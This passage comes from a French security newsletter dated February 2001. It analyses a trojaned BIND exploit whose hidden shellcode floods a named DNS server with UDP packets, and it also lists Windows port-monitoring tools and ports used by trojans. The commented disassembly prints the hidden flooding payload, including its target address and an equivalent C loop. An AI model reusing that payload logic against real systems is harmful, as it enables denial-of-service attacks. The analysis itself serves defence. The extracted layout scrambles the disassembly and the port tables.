transmission ininterrompu d'un paquet UDP sur le service DNS du système dns1.nai.com entraînant la saturation de celui-ci. Une fonction C équivalente du shellcode serait: fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) while (1) sendto(fd, somedata, 1024, 0, , 16); Un désassemblage commenté d'un partie du 'shellcode' est proposé ci-après Offset Instruction @=0 <@+54> <@+02> <@+03> <@+08> <@+10> <@+15> Jmp 0x8049576 <@+54> call0x8049542 <@+02> Pop %esi Mov $0x1,%ebx Mov %esi,%ecx Mov $0x66,%eax Int $0x80 <@+17> Mov <@+20> Lea <@+23> Mov <@+26> Xor <@+28> Mov <@+31> Lea <@+34> <@+37> <@+42> <@+47> Mov Mov Mov Lea <@+50> int <@+52> jmp <@+37> <@+59> Commentaire Le 'call' permet de récupérer l'adresse des données situées juste après <@+59> On place l'adresse des données dans %esi On place 0x1 dans %ebx (0x1 = 1 correspond au numéro d'appel système 'sys_socket') On place %esi dans %ecx (%esi = <@+59> soit l'adresse des données) On place 0x66 dans %eax (0x66 = 102 correspond au numéro d'appel syst. 'socketcall') Exécution de l'appel système (interruption 0x80) avec les données <@+59> 0x00000002 0x00000002 0x00000011 Soit Family = 2 (AF_INET, <linux/socket.h>) Type = 2 (SOCK_DGRAM, <asm/socket.h>) Protocol = 0x11 (17, UDP, <linux/in.h>) Le descripteur de socket est retourné dans %eax %eax,0x14(%esi) On place %eax (descripteur de socket) à l'adresse <@+79> (%esi+0x14 = 59+20) 0x30(%esi),%eax On place l'adresse de <@+107> (%esi+0x30 = 59+48) dans %eax L'adresse en question correspond au code d'exploitation %eax,0x18(%esi) On place cette adresse dans <@+83> (%esi+0x18 = 59+24) %eax,%eax Positionne %eax à zéro %eax,0x20(%esi) On place %eax (qui est à zéro) dans <@+91> (%esi+0x20 = 59+32) Cette adresse est normalement réservée par les 'flags' 0xc(%esi),%eax On récupère l'adresse de <@+71> (%esi+0xc = 59+12) dans %eax Adresse du 'struct sockaddr_in' pour 'sys_sendto' %eax,0x24(%esi) On place cette adresse dans <@+95> (%esi+0x24 = 59+36) $0x66,%eax On place 0x66 dans %eax (0x66 = 102 correspond au numéro d'appel système 'socketcall') $0xb,%ebx On place 0xb dans %ebx (0x0b = 11 correspond au numéro d'appel système 'sys_sendto') 0x14(%esi),%ecx On place l'adresse de <@+79> (adresse des arguments) dans %ecx Avec <@+71> 0x35000002 0x960345a1 0xffffffff 0xffffffef <@+87> 0x00000400 0x00000000 0x809a5f02 0x00000010 <@+103> 0x6e69622f 0x0068732f Soit en tenant compte des paramètres d'appel de la fonction: fs = contenu de <@+79> Valeur reçue de l'appel de socket buff = contenu de <@+83> adresse de <@+107> (code d'exploitation) len = contenu de <@+87> 0x400 soit 1024 caractères qui seront envoyés flags = contenu de <@+91> 0 soit pas de 'flag' spécial addr = contenu de <@+95> adresse de <@+71> (struct sockaddr_in) addr_len = contenu de <@+99> 0x10 (16 octets longueur de struct sockaddr) Et de la définition de la structure sockaddr_in sin_family = 0x0002 (AF_INET) sin_port = 0x3500 (soit 53) sin_addr = 0x96 0x03 0x45 0xa1 (soit 161.69.3.150 => dns1.nai.com) $0x80 Exécution de l'appel système (interruption 0x80) 0x8049565 <@+37> Puis retour à l'adresse <@+37> On boucle à l'infini entre les adresses <@+37> et <@+52> Emplacement des données Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 38/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 La technique de dissimulation employée par l'auteur de ce code est remarquable et pourrait hélas faire 'tâche d'huile' d'autant que la création d'un module générique amélioré est une tâche aisée. Notons à ce sujet que de nombreuses analyses publiées dans BugTraq ont incorrectement interprété le fonctionnement du mécanisme de déclenchement de l'attaque. Par ailleurs, aucune analyse ne mentionne que le système cible est réellement attaqué par l'envoi d'un paquet contenant une copie spécifiquement paramétrée du même shellcode ! Le système cible devient alors partie prenante de l'attaque distribuée sur NAI. En pratique, cet effet secondaire n'a pas été remarqué, les systèmes Linux RedHat 6.2 - majoritaires à ce jour - utilisant la distribution 'bind' installée par défaut étant, par chance, immune à l'attaque TSIG sélectionnée. Système source Fork Shell Code Père Shell Code UDP/53 Cible directe Shell Code Cible indirecte UDP/53 NAI Fils Nous pensons à la suite de l'analyse de ce code, et contrairement à ce qui a pu être annoncé, qu'il a volontairement été conçu comme un vecteur d'attaque distribuée en déni de service initialisée par le système DNS cible de l'attaque. L'auteur a ensuite codé, cela étant facile, une activation locale. Une question reste ouverte quand à l'origine exacte de ce code visant explicitement une grande société de sécurité. De notre point de vue, quatre hypothèses peuvent être proposées: 1. Atteindre l'image de marque de NAI: Ce mobile est peu vraisemblable, l'effet escompté n'a pas été atteint car la cible sélectionnée est un service Internet et non un produit ou développement NAI. 2. Faire valoir une compétence: Ici encore, ce mobile ne tient pas, le code étant totalement anonyme et la source réellement masquée. 3. Préparer une attaque: La saturation du DNS de NAI peut être la phase préliminaire et nécessaire à la réalisation d'une attaque à plus vaste échelle. La collaboration involontaire de plusieurs milliers de machines permet de garantir la saturation d'un système performant. Cette hypothèse qui peut sembler 'tirée par les cheveux' nous semble pourtant l'une des plus vraisemblables. En 1994, Kevin Mitnick a pénétré un système informatique en saturant préalablement un serveur particulièrement bien choisi … 4. Provoquer une réaction: La démonstration à large échelle de la vulnérabilité de l'INTERNET sur une cible particulièrement bien choisie peut conduire à l'engagement d'actions jusqu'alors non prioritaires. En 1988, le vers Morris, diffusé par le fils d'un grand responsable de la sécurité au sein d'une organisation gouvernementale Américaine, a conduit à la création du CERT-US … Complément d'information http://ids.securityportal.com/liste-archive/bugtraq/2001/Jan/0541.html (Archives alternatives de bugtraq contenant le code original) http://fatty.opf.slu.cz/bugtraq/msg05887.html (Archives alternatives de bugtraq contenant le code original) IDENTIFICATION DES SERVICES Description Sous Windows, l'identification de l'application associée à un service TCP ou UDP ouvert n'est pas chose aisée: le superbe utilitaire 'lsof' n'est disponible qu'en environnement UNIX. Si la plupart des logiciels de type 'pare-feu personnel' offrent une fonctionnalité permettant d'identifier l'application à l'origine d'une connexion ou d'un service, quelques outils simples peuvent cependant rendre de grands services: Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 39/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 FportNG v1.33 Implémenté sous la forme d'une application console fonctionnant en environnement NT et 2000, fPortNG est un utilitaire gratuit proposé par le société FoundStone. Simple, efficace, et de faible encombrement (2 fichiers de 141Ko au total). Divers autres utilitaires gratuits dédiés à l'environnement NT sont disponibles sur le site de cette société dont: - Fpipe v2.1, un redirecteur de port TCP/UDP permettant de rediriger le trafic d'un port sur un autre et ainsi éventuellement de traverser un dispositif de sécurité, - Fscan v1.12, un scanner de port TCP/UDP utilisant le mode ligne de commande, - SuperScan v3.0, l'un des scanners de port en mode graphique les plus connus en environnement Windows. TcpView v1.11 Version évoluée et graphique de netstat, TcpView v1.11 permet de visualiser instantanément l'état des connexions TCP/UDP, le tout sous la forme d'un unique exécutable de moins de 75Ko ! La version payante, TcpView Pro (1.8Mo) permet de visualiser les processus associés aux connexions. Le site 'sysinternals.com' offre par ailleurs de très nombreux logiciels de surveillance dédiés à l'environnement NT/2000: - HandleEx v3.11, un utilitaire similaire à 'lsof' permettant de visualiser les descripteurs et ressources ouvertes ainsi que les applications associées, - TDIMon v1.01, un outil de visualisation en temps réel la sources et les paramètres des requêtes effectuées sur TDI (Interface Programmatique de Transport) et les réponses associées. Complément d'information http://www.foundstone.com/rdlabs/proddesc/fport.html http://www.sysinternals.com/ntw2k/utilities.shtml LA LISTE NON OFFICIELLE DES NUMEROS DE PORT TC/UDP Description Une compilation des numéros de ports utilisés par différents Maliciels - Chevaux de Troie, Vers, Portes dérobées - est proposée sous la forme d'une liste classée par numéros de ports croissants. Cette liste, comportant 317 entrées, résulte d'une compilation de différentes sources disponibles sur le WEB. Ces informations sont fournies pour ce quelles valent, en tant qu'aide à l'analyse d'un problème de compromission ou d'intrusion, mais sans garantie d'exactitude ou d'exhaustivité. Attention, certains numéro de ports indiqués correspondent à un service normalisé - ie: port 21, Service TCP - mais peuvent aussi être utilisés, notamment en environnement Windows™, par un Cheval de Troie ayant pris la place du service. 2 21 22 23 31 41 48 50 58 79 80 81 99 110 113 Death BladeRunner Shaft FireHacker Master Paradise, Agent 31 Deep Throat Drat Drat DM Setup CDK, FireHotchker AckCmd, BackEnd RemoConChubo Hidden port ProMail Trojan Invisible daemon Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 119 121 123 133 142 146 170 334 420 421 456 513 514 531 555 Happy99 BO, JammerKillahV NetController Farnaz NetTaxi Infector A-Trojan Backage Breach TCP Wrapper Trojan Hackers Paradise Grlogin RPC Backdoor Rasmin StealthSpy, Phase0, NeTadmin 605 666 667 669 692 777 808 911 999 1000 1001 1010 1011 1012 1015 SecretService Attack FTP SniperNet DP Trojan GayOL AimSpy, Undetected WinHole Dark Shadow Deep Throat Der Spaeher Silencer, WebEx Doly trojan v1.35 Doly Trojan Doly Trojan Doly trojan v1.5 Page 40/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 1016 1020 1024 1033 1042 1045 1049 1050 1054 1080 1081 1082 1083 1090 1095 1097 1098 1099 1170 1200 1201 1207 1212 1234 1243 1245 1255 1256 1269 1313 1338 1349 1492 1509 1524 1600 1777 1807 1966 1969 1981 1999 2000 2001 2023 2080 2115 2140 2155 2255 2283 2300 2339 2345 2565 2583 2600 2716 2773 2801 2989 3000 3024 3128 3129 3150 3456 3459 3700 3791 3801 4000 4092 4242 4321 4444 4567 4590 4950 5000 5001 Doly Trojan Vampire NetSpy Netspy BlaTrojan 1.1 Rasmin /sbin/Initd MiniCommand AckCmd Wingate, WinHole WinHole WinHole WinHole Xtreme RAT RAT RAT RAT, BloodFest Streaming Audio Trojan NoBackO (UDP) NoBackO (UDP) SoftWAR Kaos Ultors Trojan SubSeven Vodoo Doll Scarab Project Next Maverick's Matrix NETrojan Millenium Worm Bo DLL FTP99CMP aa Trin00 Shiva Burka Scarab SpySender Fake FFFFFFTP OpC BO ShockRave, Bowl Backdoor Der Spaeher, Insane Der Spaeher, TrojanCow Pass Ripper WinHole Bugs The Invasor, DeepThroat (UDP) Illusion Mailer Nirvana RAT 5 Xplorer Voice Spy Doly Trojan Striker Wincrash2 Digital RootBeer The Prayer SubSeven 2.1 Gold Phineas Rat (UDP) Remote Shut WinCrash RingZero Master Paradise The Invasor, DeepThroat (UDP) Terror Trojan Eclipse2000, Sanctuary Portal of Doom Total Eclypse 1.0 Total Eclypse 1.0 SkyDance WinCrash Virtual Machine Hack BoBo Prosiak, Swift Remote File Nail IcqTrojan IcqTrojan Blazer5, Socket23 Back Door Setup, Socket23 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 5010 5011 5025 5031 5032 5321 5400 5401 5402 5512 5550 5555 5556 5569 5637 5638 5742 5760 5882 5888 6000 6006 6272 6400 6666 6667 6669 6670 6711 6712 6713 6723 6771 6776 6838 6883 6912 6939 6969 6970 7000 7301 7306 7307 7308 7424 7597 7777 7789 7983 8080 8787 8988 8989 9325 9400 9872 9873 9874 9875 9878 9989 10067 10085 10086 10101 10167 10520 10607 10666 11000 11050 11051 11223 12076 12223 12345 12346 12349 12361 12362 Solo OOTLT + OOTLT Cart WM Remote Keylogger NetMetro 1.0 NetMetro 1.0 Firehotcker BladeRunner, BackConst. 1.2 BladeRunner, BackConst. 1.2 BladeRunner, BackConst. 1.2 Illusion Mailer Xtcp ServeMe BO Facility RoboHack PC Crasher PC Crasher Wincrash Linux Portmap Remote root Y3K RAT (UDP) Y3K RAT The tHing Bad Blood Secret Service The tHing NetBus Worm Satan Vampire Deep Throath 1,2,3.x SubSeven SubSeven SubSeven MStream Deep Throat SubSeven MStream (UDP) DeltaSource Shitheep Indoctrination Gatecrasher, Priority Gatecrasher Remote Grab, SubSeven Gold Net Monitor Net Monitor Net Monitor Net Monitor Host Control QaZ Tini ICQKiller MStream Brown Orifice, RingZero BO2K BacHack Rcon, Xcon MStream (UDP) InCommand 1.0 Portal of Doom Portal of Doom Portal of Doom Portal of Doom TransScout InIkiller Portal of Doom Syphillis Syphillis BrainSpy Portal of Doom Acid Shivers Coma Ambush (UDP) Senna Spy Trojans Host Control Host Control ProgenicTrojan Gjamer Hack´99 KeyLogger Telnet Trojan NetBus 1.x BioNet Whack-a-mole Whack-a-mole (UDP) 12623 12624 12631 12701 12754 13000 13010 14500 15092 15104 15858 16484 16660 16772 16969 17166 17300 17449 17499 17777 18753 19864 20000 20001 20002 20023 20034 20203 20331 20432 20433 21554 22222 23005 23023 23032 23432 23456 23476 23477 26274 26681 27374 27444 27573 27665 29104 29891 30001 30003 30029 30100 30101 30102 30103 30133 30303 30947 30999 31335 31336 31337 31338 31339 31666 31785 31788 31789 31790 31791 31001 32100 32418 33270 33333 33577 33911 34324 34444 34555 35555 DUN Control (UDP) Buttman Whack Job Eclipse 2000 MStream Senna Spy Hacker Brazil PC Invader Host Control mStream CDK Mosucker StrachelDraft ICQ Revenge Priority Mosaic Kuang2 theVirus Kid Terror Crazzy Net Nephron Shaft (UDP) Icq Revenge Millenium Millenium AcidkoR VP Killer NetBus 2 Pro Logged!, Chupacabra Bla Shaft Shaft (UDP) GirlFriend, Schwindler 1.82 Prosiak 0.47 NetTrash Logged! Amanda Asylum Evil FTP, Whack Job Donald Dick Donald Dick Delta Source (UDP) Voice Spy SubSeven, Ramen Trin00 (UDP) SubSeven Trin00 NetTrojan The Unexplained ErrOr32 Lamer's Death AOLTrojan1.1 NetSphere NetSphere NetSphere NetSphere NetSphere Socket23 Intruse Kuang2 Trin00 Butt Funnel BackOriffice DeepBO NetSpy DK BBBOWhack Hack'a'tack Hack'a'tack Hack'a'tack (UDP) Hack'a'tack Hack'a'tack (UDP) Donald Dick Project Next, Peanut Brittle Acid Battery Trinity Prosiak PsychWard Trojan Spirit 2001 Tiny Telnet Server, BigGluck Donald Dick Trin00 Windows (UDP) Trin00 Windows (UDP) Page 41/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 40412 40421 40422 40423 40425 40426 41666 44444 47262 50505 TheSpy Master Paradise, Agent 40421 Master Paradise Master Paradise Master Paradise Master Paradise RBT Prosiak Delta Source (UDP) Socket23 50766 51966 52317 53001 54283 54320 54321 57341 60000 60068 Fore, Schwindler Cafeini Acid Battery 2000 Remote Windows Shutdown SubSeven BO 2000 Schoolbus 1.6 NetRaider Deep Throat Xzip 61348 61466 61603 63485 64101 65000 65432 65534 65535 Bunker Hill Telecommando Bunker Hill Bunker Hill TaskMan Devil 1.03 The Traitor /sbin/Initd RC1 Trojan Complément d’information http://websites.ntl.com/~leo.filos/trojanh.htm http://www.simovits.com/nyheter9902.html http://www.clic.net/~hello/puppet/nnports.html Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 42/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Documents pareils
Veille Technologique Sécurité
Site susceptible d’héberger des informations ou des programmes dont l’utilisation est répréhensible au titre de la Loi Française.
Plus en détail